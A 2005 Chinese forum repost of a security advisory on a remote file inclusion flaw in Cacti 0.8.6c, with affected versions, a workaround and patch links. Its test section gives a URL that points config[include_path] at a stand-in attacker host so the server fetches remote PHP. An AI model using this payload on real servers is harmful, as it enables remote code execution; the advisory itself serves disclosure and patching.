ido社区-ido.3mt.com.cn数码生活 XML

RaXnet出现远程文件漏洞


发贴人:221.8.204.*     发贴时间:2005-8-8    【复制本帖地址】[必看

  >>  
 

受影响系统:

Raxnet Cacti 0.8.6c

不受影响系统:

Raxnet Cacti 0.8.6e

描述:Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。

Cacti的config_settings.php脚本中存在输入验证错误,可能允许攻击者包含远程站点的任意PHP代码。这可能导致以web server的权限执行任意代码。

漏洞起因是脚本相信了用户所提供的include_path变量。

测试方法:(以下程序或方法可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!)

http://example.com/include/config_settings.php?config[include_path]=http://attackersite.com/

临时解决方法:(如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁)

* 对访问Cacti安装要求认证;将对使用Cacti的web server的访问仅限于可信任的主机。

厂商补丁:

Gentoo已经为此发布了一个安全公告(GLSA-200506-20)以及相应补丁:

GLSA-200506-20:Cacti: Several vulnerabilities

链接:http://security.gentoo.org/glsa/glsa-200506-20.xml

所有Cacti用户都应升级到最新版本:

Raxnet已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载cacti 0.8.6e版本:

http://www.cacti.net/downloads/cacti-0.8.6e.tar.gz

http://www.cacti.net/downloads/cacti-0.8.6e.zip


上一贴:伊藤穰一:把部落格「Google」化(图)
下一贴:RealNetworksRealPlaye出漏洞
科技IT
IT世界
数码生活
通信网络
汽车时代
生活娱乐
体育焦点
娱乐八卦
开心爆笑
旅游美景
健康综合
房产装修
社区文学
鬼话恐怖
网络文学
史料杂话
长篇嚼字
情感男女
星座情感
情感世界
男人女人
动漫空间
动漫发烧
游戏发烧
影视发烧
音乐发烧
摄影贴图
贴图空间
摄影空间
社会军事
中国加油
股票经济
新知文化
社会万象
  >> 查看发言   [本主题共有帖数 0 篇]
 
  >> 查看更多评论   [共有0条评论]
快速回复


点评: 字数0
姓名:


  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款